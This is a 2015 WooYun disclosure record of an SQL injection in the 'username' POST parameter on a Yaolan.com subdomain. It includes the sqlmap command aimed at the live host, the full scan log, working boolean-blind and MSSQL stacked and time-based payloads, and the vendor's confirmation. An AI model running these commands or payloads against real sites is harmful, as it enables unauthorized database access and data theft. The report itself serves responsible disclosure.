当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136134

漏洞标题:摇篮网某站SQL注入 泄露数据

相关厂商:摇篮网

漏洞作者: crown丶prince

提交时间:2015-08-23 13:02

修复时间:2015-10-10 09:42

公开时间:2015-10-10 09:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

摇篮网某站SQL注入 泄露数据

详细说明:

POST注入:
【sqlmap语句】:
python sqlmap.py -u "http://mensao.app.yaolan.com/Test" --data "username=88952634 " --current-db
【注入点】:mensao.app.yaolan.com
【POST】:username=88952634
current database: 'mensao.app.yaolan.com'
【sqlmap截图】 如下:

漏洞证明:

1.jpg


【sqlmap过程】:

[18:59:13] [INFO] testing connection to the target URL
[18:59:13] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[18:59:14] [INFO] target URL is stable
[18:59:14] [INFO] testing if POST parameter 'username' is dynamic
[18:59:14] [INFO] confirming that POST parameter 'username' is dynamic
[18:59:14] [WARNING] POST parameter 'username' does not appear dynamic
[18:59:14] [WARNING] heuristic (basic) test shows that POST parameter 'username'
might not be injectable
[18:59:15] [INFO] testing for SQL injection on POST parameter 'username'
[18:59:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:15] [INFO] POST parameter 'username' seems to be 'AND boolean-based blind
- WHERE or HAVING clause' injectable
[18:59:17] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n]
[19:00:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:00:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[19:00:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause (IN)'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[19:00:13] [INFO] testing 'MySQL inline queries'
[19:00:13] [INFO] testing 'PostgreSQL inline queries'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:13] [INFO] testing 'Oracle inline queries'
[19:00:13] [INFO] testing 'SQLite inline queries'
[19:00:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:00:13] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.
[19:00:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[19:00:23] [INFO] POST parameter 'username' seems to be 'Microsoft SQL Server/Sy
base stacked queries' injectable
[19:00:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:00:33] [INFO] POST parameter 'username' seems to be 'Microsoft SQL Server/Sy
base time-based blind' injectable
[19:00:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:00:33] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:00:33] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[19:00:34] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[19:00:36] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. '--dbms=mysql')
[19:00:36] [INFO] checking if the injection point on POST parameter 'username' i
s a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requ
ests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=88952634 ' AND 9903=9903 AND 'QHqk'='QHqk
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=88952634 '; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=88952634 ' WAITFOR DELAY '0:0:5'--
---
[19:00:37] [INFO] testing Microsoft SQL Server
[19:00:37] [INFO] confirming Microsoft SQL Server
[19:00:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005

修复方案:

版权声明:转载请注明来源 crown丶prince@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-26 09:40

厂商回复:

漏洞正在修复,感谢白帽子的工作!

最新状态:

暂无